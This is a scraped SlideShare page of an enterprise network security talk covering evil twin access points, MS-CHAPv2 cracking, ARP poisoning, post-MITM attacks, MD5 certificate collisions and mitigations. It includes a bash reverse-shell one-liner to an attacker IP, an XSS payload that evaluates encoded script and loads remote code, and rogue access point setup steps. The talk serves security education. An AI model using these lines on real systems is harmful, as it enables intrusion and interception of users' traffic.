Download to read offline
![Cryptanalysis of MS-CHAPv2
ChallengeHash = SHA1(random|| username)[0:8]
ChallengeHash
ChallengeResponse
Note: Original complexity analysis has been done by Moxie Marlinspike](https://image.slidesharecdn.com/gvjno45qrwiqfbal2i57-signature-d94f514d124e6f4b977c9cbe170e7b1ee5bffed4f15e3d52ac0eb65e922954b4-poli-161211082846/85/Breaking-Bad-Enterprise-Network-Security-13-320.jpg)
![Certificate Collision Attack
CA
DomainA
isCA?
CSR Ekey[Sha(csr.tbs)]
DomainA
isCA?
DomainA
isCA?
CertificateCSR.TBS
Sha( domainA.csr ) Sha( domainB.csr )
md5( domainA.csr
)
md5( domainB.csr )
True
False
MD5 Collision
Certificate Collision](https://image.slidesharecdn.com/gvjno45qrwiqfbal2i57-signature-d94f514d124e6f4b977c9cbe170e7b1ee5bffed4f15e3d52ac0eb65e922954b4-poli-161211082846/85/Breaking-Bad-Enterprise-Network-Security-20-320.jpg)
Uploaded byNavneet kumar
Breaking Bad: Enterprise Network Security
The document discusses various cybersecurity concepts, including OSI protocols, attacks like the evil twin attack and ARP poisoning, and cryptanalysis techniques for MS-CHAPv2. It also covers post-MITM attack vectors and reverse shell methods, detailing the steps attackers might use to exploit network vulnerabilities. Mitigation strategies such as SSL certificate pinning and proper configuration of network security measures are emphasized for protecting against these attacks.
More Related Content
Breaking Bad: Enterprise Network Security
- 1.
- 2. Overview • Demo • OSIProtocols Overview • Evil Twin Attack • Cryptanalysis : MS-CHAPv2 • ARP poisoning • POST-MITM Attack vectors • Reverse Shell • Mitigations • Certificate Collision Attack Note: Some Images in this presentation has been taken from web for illustration
- 3. SilverFish Worm XSS NPAPI runtime Shell <img src='a'onerror=eval(atob('JC5'))> = $.getScript('https://goo.gl/zByVrM') masterPlugin.updatePlugin(“attacker-plugin”,success,failure) Netcat Shell / ssh daemon / Bounjour Hatching rate = ng n=Average # of endpoints per meeting g=# of generation g=0 g=1 g=2
- 4.
- 5.
- 6.
- 7.
- 8. Soft AP •Put WNICin Master Mode and use Forged CA cert •Configure AP SSID to “bjn-int” •DAUTH to actual AP Network •Setup DNS •Setup DHCP Routing •Redirect 80,443 packets to proxy port •Forward traffic after NAT Capture •Use Same CA cert for signing •Sniff in proxy Attack Setup Note: Chrome uses certificate pinning for *.google.com
- 9. Fake BSSID Highest Strength 2.4GHz Channel Wireless Scan
- 10.
- 11.
- 12. Soft AP DHCP RoutingProxy
- 13. Cryptanalysis of MS-CHAPv2 ChallengeHash= SHA1(random|| username)[0:8] ChallengeHash ChallengeResponse Note: Original complexity analysis has been done by Moxie Marlinspike
- 14. Cryptanalysis of MS-CHAPv2 Note:Original complexity analysis has been done by Moxie Marlinspike 7 byte 7 byte 2 byte Complexity = 256 time < 24 hrs ( 100% success )
- 15.
- 16. POST-MITM Attack Vectors ReverseShell Bind Shell Session Hijacking Above L3 Attacks
- 17. Reverse Bind Shell •Give a network shell to attacker • Works Behind NAT • Gets Root Access HOW ???? $ bash -i >& /dev/tcp/<attacker-ip>/5555 0>&1
- 18.
- 19. Mitigation Pre-deployment of enterprisewide CA SSL Cert Pinning for updates Proper WIPS Configuration Arp Spoof Mitigations Careful CA signing
- 20. Certificate Collision Attack CA DomainA isCA? CSREkey[Sha(csr.tbs)] DomainA isCA? DomainA isCA? CertificateCSR.TBS Sha( domainA.csr ) Sha( domainB.csr ) md5( domainA.csr ) md5( domainB.csr ) True False MD5 Collision Certificate Collision